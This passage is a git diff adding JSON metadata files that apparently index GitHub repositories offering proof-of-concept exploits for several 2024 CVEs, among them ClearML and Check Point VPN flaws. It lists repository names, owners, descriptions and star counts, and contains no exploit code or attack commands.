"CVE-2024-24576-PoC-Rust", + "full_name": "Gaurav1020\/CVE-2024-24576-PoC-Rust", + "owner": { + "login": "Gaurav1020", + "id": 81969930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81969930?v=4", + "html_url": "https:\/\/github.com\/Gaurav1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gaurav1020\/CVE-2024-24576-PoC-Rust", + "description": null, + "fork": false, + "created_at": "2024-04-20T18:54:00Z", + "updated_at": "2024-04-20T18:59:01Z", + "pushed_at": "2024-04-20T18:58:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789761052, + "name": "CVE-2024-24576-PoC-BatBadBut", + "full_name": "SheL3G\/CVE-2024-24576-PoC-BatBadBut", + "owner": { + "login": "SheL3G", + "id": 76014923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76014923?v=4", + "html_url": "https:\/\/github.com\/SheL3G", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SheL3G\/CVE-2024-24576-PoC-BatBadBut", + "description": "PoC for CVE-2024-24576 vulnerability \"BatBadBut\"", + "fork": false, + "created_at": "2024-04-21T13:42:28Z", + "updated_at": "2024-04-21T17:57:34Z", + "pushed_at": "2024-04-21T17:57:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24590.json b/2024/CVE-2024-24590.json new file mode 100644 index 0000000000..6a201b2152 --- /dev/null +++ b/2024/CVE-2024-24590.json @@ -0,0 +1,219 @@ +[ + { + "id": 813864710, + "name": "ClearML-CVE-2024-24590", + "full_name": "OxyDeV2\/ClearML-CVE-2024-24590", + "owner": { + "login": "OxyDeV2", + "id": 46215222, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46215222?v=4", + "html_url": "https:\/\/github.com\/OxyDeV2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OxyDeV2\/ClearML-CVE-2024-24590", + "description": "Proof of concept for CVE-2024-24590", + "fork": false, + "created_at": "2024-06-11T22:30:26Z", + "updated_at": "2024-06-14T20:13:28Z", + "pushed_at": "2024-06-13T11:33:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814871568, + "name": "CVE-2024-24590-ClearML-RCE-Exploit", + "full_name": "xffsec\/CVE-2024-24590-ClearML-RCE-Exploit", + "owner": { + "login": "xffsec", + "id": 162821824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162821824?v=4", + "html_url": "https:\/\/github.com\/xffsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xffsec\/CVE-2024-24590-ClearML-RCE-Exploit", + "description": null, + "fork": false, + "created_at": "2024-06-13T22:17:57Z", + "updated_at": "2024-10-01T15:22:55Z", + "pushed_at": "2024-06-13T22:20:15Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815490192, + "name": "CVE-2024-24590-ClearML-RCE-CMD-POC", + "full_name": "diegogarciayala\/CVE-2024-24590-ClearML-RCE-CMD-POC", + "owner": { + "login": "diegogarciayala", + "id": 84715095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84715095?v=4", + "html_url": "https:\/\/github.com\/diegogarciayala", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diegogarciayala\/CVE-2024-24590-ClearML-RCE-CMD-POC", + "description": "CVE-2024-24590 ClearML RCE&CMD POC", + "fork": false, + "created_at": "2024-06-15T10:09:51Z", + "updated_at": "2024-11-20T16:30:49Z", + "pushed_at": "2024-06-15T11:09:13Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817754834, + "name": "CVE-2024-24590", + "full_name": "junnythemarksman\/CVE-2024-24590", + "owner": { + "login": "junnythemarksman", + "id": 20056452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056452?v=4", + "html_url": "https:\/\/github.com\/junnythemarksman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/junnythemarksman\/CVE-2024-24590", + "description": "Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.", + "fork": false, + "created_at": "2024-06-20T11:23:56Z", + "updated_at": "2024-10-06T20:48:49Z", + "pushed_at": "2024-06-21T00:52:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831603638, + "name": "ClearML-CVE-2024-24590-RCE", + "full_name": "sviim\/ClearML-CVE-2024-24590-RCE", + "owner": { + "login": "sviim", + "id": 172663851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172663851?v=4", + "html_url": "https:\/\/github.com\/sviim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sviim\/ClearML-CVE-2024-24590-RCE", + "description": "With this script you can exploit the CVE-2024-24590", + "fork": false, + "created_at": "2024-07-21T04:16:24Z", + "updated_at": "2024-11-20T16:30:57Z", + "pushed_at": "2024-07-21T04:48:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840977646, + "name": "cve-2024-24590", + "full_name": "Bigb972003\/cve-2024-24590", + "owner": { + "login": "Bigb972003", + "id": 139943997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139943997?v=4", + "html_url": "https:\/\/github.com\/Bigb972003", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bigb972003\/cve-2024-24590", + "description": null, + "fork": false, + "created_at": "2024-08-11T09:21:08Z", + "updated_at": "2024-08-11T09:21:08Z", + "pushed_at": "2024-08-11T09:21:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869071531, + "name": "CVE-2024-24590", + "full_name": "j3r1ch0123\/CVE-2024-24590", + "owner": { + "login": "j3r1ch0123", + "id": 110147529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110147529?v=4", + "html_url": "https:\/\/github.com\/j3r1ch0123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j3r1ch0123\/CVE-2024-24590", + "description": "Created this exploit for the Hack The Box machine, Blurry.", + "fork": false, + "created_at": "2024-10-07T17:07:10Z", + "updated_at": "2024-10-07T17:18:24Z", + "pushed_at": "2024-10-07T17:18:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24684.json b/2024/CVE-2024-24684.json new file mode 100644 index 0000000000..3090d31259 --- /dev/null +++ b/2024/CVE-2024-24684.json @@ -0,0 +1,33 @@ +[ + { + "id": 873286914, + "name": "CVE-2024-24684", + "full_name": "SpiralBL0CK\/CVE-2024-24684", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-24684", + "description": "Crash File ( Poc for CVE-2024-24684)", + "fork": false, + "created_at": "2024-10-15T23:04:32Z", + "updated_at": "2024-10-15T23:05:12Z", + "pushed_at": "2024-10-15T23:05:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24685.json b/2024/CVE-2024-24685.json new file mode 100644 index 0000000000..57eed979b3 --- /dev/null +++ b/2024/CVE-2024-24685.json @@ -0,0 +1,33 @@ +[ + { + "id": 873290083, + "name": "CVE-2024-24685", + "full_name": "SpiralBL0CK\/CVE-2024-24685", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-24685", + "description": "Crash File ( Poc for CVE-2024-24685)", + "fork": false, + "created_at": "2024-10-15T23:16:05Z", + "updated_at": "2024-10-15T23:16:35Z", + "pushed_at": "2024-10-15T23:16:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24686.json b/2024/CVE-2024-24686.json new file mode 100644 index 0000000000..7981c62316 --- /dev/null +++ b/2024/CVE-2024-24686.json @@ -0,0 +1,33 @@ +[ + { + "id": 873291160, + "name": "CVE-2024-24686", + "full_name": "SpiralBL0CK\/CVE-2024-24686", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-24686", + "description": "Crash File ( Poc for CVE-2024-24686)", + "fork": false, + "created_at": "2024-10-15T23:20:34Z", + "updated_at": "2024-10-16T08:47:37Z", + "pushed_at": "2024-10-15T23:20:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24725.json b/2024/CVE-2024-24725.json new file mode 100644 index 0000000000..e72493732a --- /dev/null +++ b/2024/CVE-2024-24725.json @@ -0,0 +1,33 @@ +[ + { + "id": 877945371, + "name": "CVE-2024-24725-PoC", + "full_name": "MelkorW\/CVE-2024-24725-PoC", + "owner": { + "login": "MelkorW", + "id": 144314304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144314304?v=4", + "html_url": "https:\/\/github.com\/MelkorW", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MelkorW\/CVE-2024-24725-PoC", + "description": null, + "fork": false, + "created_at": "2024-10-24T14:07:47Z", + "updated_at": "2024-10-25T07:04:17Z", + "pushed_at": "2024-10-24T14:08:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24760.json b/2024/CVE-2024-24760.json new file mode 100644 index 0000000000..feea4a9aad --- /dev/null +++ b/2024/CVE-2024-24760.json @@ -0,0 +1,33 @@ +[ + { + "id": 766707015, + "name": "CVE-2024-24760", + "full_name": "killerbees19\/CVE-2024-24760", + "owner": { + "login": "killerbees19", + "id": 21372289, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21372289?v=4", + "html_url": "https:\/\/github.com\/killerbees19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/killerbees19\/CVE-2024-24760", + "description": "mailcow: Docker Container Exposure to Local Network", + "fork": false, + "created_at": "2024-03-04T00:53:35Z", + "updated_at": "2024-03-04T00:53:35Z", + "pushed_at": "2024-03-04T00:54:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24787.json b/2024/CVE-2024-24787.json new file mode 100644 index 0000000000..9e14a85b4a --- /dev/null +++ b/2024/CVE-2024-24787.json @@ -0,0 +1,33 @@ +[ + { + "id": 798649279, + "name": "CVE-2024-24787-PoC", + "full_name": "LOURC0D3\/CVE-2024-24787-PoC", + "owner": { + "login": "LOURC0D3", + "id": 83567597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4", + "html_url": "https:\/\/github.com\/LOURC0D3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2024-24787-PoC", + "description": "CVE-2024-24787 Proof of Concept", + "fork": false, + "created_at": "2024-05-10T07:45:51Z", + "updated_at": "2024-11-20T16:30:46Z", + "pushed_at": "2024-05-10T08:03:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24809.json b/2024/CVE-2024-24809.json new file mode 100644 index 0000000000..f076fdd620 --- /dev/null +++ b/2024/CVE-2024-24809.json @@ -0,0 +1,33 @@ +[ + { + "id": 851552545, + "name": "CVE-2024-24809-Proof-of-concept", + "full_name": "gh-ost00\/CVE-2024-24809-Proof-of-concept", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-24809-Proof-of-concept", + "description": "Critical Flaws in Traccar GPS System Expose Users to Remote Attacks", + "fork": false, + "created_at": "2024-09-03T09:56:13Z", + "updated_at": "2024-09-07T03:28:57Z", + "pushed_at": "2024-09-03T10:14:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24816.json b/2024/CVE-2024-24816.json new file mode 100644 index 0000000000..dba9476125 --- /dev/null +++ b/2024/CVE-2024-24816.json @@ -0,0 +1,33 @@ +[ + { + "id": 755475889, + "name": "CVE-2024-24816", + "full_name": "afine-com\/CVE-2024-24816", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2024-24816", + "description": "CKEditor 4 < 4.24.0-lts - XSS vulnerability in samples that use the \"preview\" feature.", + "fork": false, + "created_at": "2024-02-10T10:26:35Z", + "updated_at": "2024-05-22T14:25:57Z", + "pushed_at": "2024-02-10T10:32:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-24919.json b/2024/CVE-2024-24919.json new file mode 100644 index 0000000000..1c5d2ba8d7 --- /dev/null +++ b/2024/CVE-2024-24919.json @@ -0,0 +1,1738 @@ +[ + { + "id": 808011196, + "name": "CVE-2024-24919", + "full_name": "c3rrberu5\/CVE-2024-24919", + "owner": { + "login": "c3rrberu5", + "id": 109983457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109983457?v=4", + "html_url": "https:\/\/github.com\/c3rrberu5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c3rrberu5\/CVE-2024-24919", + "description": "Nuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.", + "fork": false, + "created_at": "2024-05-30T07:55:53Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-05-30T07:58:10Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808179001, + "name": "CVE-2024-24919", + "full_name": "emanueldosreis\/CVE-2024-24919", + "owner": { + "login": "emanueldosreis", + "id": 5330737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5330737?v=4", + "html_url": "https:\/\/github.com\/emanueldosreis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emanueldosreis\/CVE-2024-24919", + "description": "POC exploit for CVE-2024-24919 information leakage ", + "fork": false, + "created_at": "2024-05-30T14:41:32Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-05-30T18:56:32Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808207791, + "name": "CVE-2024-24919", + "full_name": "hendprw\/CVE-2024-24919", + "owner": { + "login": "hendprw", + "id": 128204375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128204375?v=4", + "html_url": "https:\/\/github.com\/hendprw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hendprw\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-30T15:40:11Z", + "updated_at": "2024-05-30T15:42:26Z", + "pushed_at": "2024-05-30T15:42:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808225578, + "name": "CVE-2024-24919", + "full_name": "LucasKatashi\/CVE-2024-24919", + "owner": { + "login": "LucasKatashi", + "id": 41309932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41309932?v=4", + "html_url": "https:\/\/github.com\/LucasKatashi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasKatashi\/CVE-2024-24919", + "description": "CVE-2024-24919 Exploit PoC", + "fork": false, + "created_at": "2024-05-30T16:23:18Z", + "updated_at": "2024-08-09T11:48:41Z", + "pushed_at": "2024-05-30T17:08:11Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-24919", + "exploit", + "lfi", + "poc" + ], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808251805, + "name": "CVE-2024-24919", + "full_name": "yagyuufellinluvv\/CVE-2024-24919", + "owner": { + "login": "yagyuufellinluvv", + "id": 170684196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170684196?v=4", + "html_url": "https:\/\/github.com\/yagyuufellinluvv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yagyuufellinluvv\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-30T17:26:08Z", + "updated_at": "2024-06-01T00:09:54Z", + "pushed_at": "2024-06-01T00:09:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808315341, + "name": "CVE-2024-24919", + "full_name": "Bytenull00\/CVE-2024-24919", + "owner": { + "login": "Bytenull00", + "id": 19710178, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19710178?v=4", + "html_url": "https:\/\/github.com\/Bytenull00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bytenull00\/CVE-2024-24919", + "description": "Quick and simple script that takes as input a file with multiple URLs to check for the CVE-2024-24919 vulnerability in CHECKPOINT", + "fork": false, + "created_at": "2024-05-30T20:14:19Z", + "updated_at": "2024-06-09T20:21:52Z", + "pushed_at": "2024-05-30T21:49:43Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808371269, + "name": "CVE-2024-24919", + "full_name": "am-eid\/CVE-2024-24919", + "owner": { + "login": "am-eid", + "id": 95753520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95753520?v=4", + "html_url": "https:\/\/github.com\/am-eid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/am-eid\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-30T23:52:53Z", + "updated_at": "2024-05-31T00:06:43Z", + "pushed_at": "2024-05-31T00:06:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808389014, + "name": "CVE-2024-24919", + "full_name": "P3wc0\/CVE-2024-24919", + "owner": { + "login": "P3wc0", + "id": 66764041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66764041?v=4", + "html_url": "https:\/\/github.com\/P3wc0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/P3wc0\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-31T01:14:19Z", + "updated_at": "2024-05-31T01:39:05Z", + "pushed_at": "2024-05-31T01:39:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808505785, + "name": "CVE-2024-24919", + "full_name": "zam89\/CVE-2024-24919", + "owner": { + "login": "zam89", + "id": 3533227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3533227?v=4", + "html_url": "https:\/\/github.com\/zam89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zam89\/CVE-2024-24919", + "description": "Simple POC Python script that check & leverage Check Point CVE-2024-24919 vulnerability (Wrong Check Point)", + "fork": false, + "created_at": "2024-05-31T07:59:17Z", + "updated_at": "2024-05-31T14:05:10Z", + "pushed_at": "2024-05-31T08:16:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-24919", + "exploit", + "poc", + "python3" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808506486, + "name": "CVE-2024-24919", + "full_name": "satriarizka\/CVE-2024-24919", + "owner": { + "login": "satriarizka", + "id": 42266999, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42266999?v=4", + "html_url": "https:\/\/github.com\/satriarizka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/satriarizka\/CVE-2024-24919", + "description": "A simple bash and python script to check for the vulnerability CVE-2024-24919", + "fork": false, + "created_at": "2024-05-31T08:01:13Z", + "updated_at": "2024-05-31T09:02:26Z", + "pushed_at": "2024-05-31T08:37:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve-2024-24919", + "poc", + "python", + "shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808560094, + "name": "CVE-2024-24919", + "full_name": "RevoltSecurities\/CVE-2024-24919", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-24919", + "description": "An Vulnerability detection and Exploitation tool for CVE-2024-24919", + "fork": false, + "created_at": "2024-05-31T10:18:36Z", + "updated_at": "2024-10-21T10:39:06Z", + "pushed_at": "2024-06-05T11:38:12Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808586285, + "name": "CVE-2024-24919", + "full_name": "Vulnpire\/CVE-2024-24919", + "owner": { + "login": "Vulnpire", + "id": 89225495, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89225495?v=4", + "html_url": "https:\/\/github.com\/Vulnpire", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnpire\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-31T11:29:03Z", + "updated_at": "2024-05-31T11:36:29Z", + "pushed_at": "2024-05-31T11:36:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808595288, + "name": "CVE-2024-24919-POC", + "full_name": "seed1337\/CVE-2024-24919-POC", + "owner": { + "login": "seed1337", + "id": 99613932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99613932?v=4", + "html_url": "https:\/\/github.com\/seed1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seed1337\/CVE-2024-24919-POC", + "description": null, + "fork": false, + "created_at": "2024-05-31T11:52:59Z", + "updated_at": "2024-10-21T13:18:17Z", + "pushed_at": "2024-05-31T22:55:07Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 47, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808601031, + "name": "CVE-2024-24919", + "full_name": "0xYumeko\/CVE-2024-24919", + "owner": { + "login": "0xYumeko", + "id": 154844497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154844497?v=4", + "html_url": "https:\/\/github.com\/0xYumeko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xYumeko\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-31T12:08:28Z", + "updated_at": "2024-06-07T12:15:19Z", + "pushed_at": "2024-06-01T12:22:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808601596, + "name": "CVE-2024-24919-Check-Point-Remote-Access-VPN", + "full_name": "Praison001\/CVE-2024-24919-Check-Point-Remote-Access-VPN", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-24919-Check-Point-Remote-Access-VPN", + "description": null, + "fork": false, + "created_at": "2024-05-31T12:10:05Z", + "updated_at": "2024-06-02T12:40:00Z", + "pushed_at": "2024-06-02T12:39:57Z", + "stargazers_count": 0, + "watchers_count": 0, + 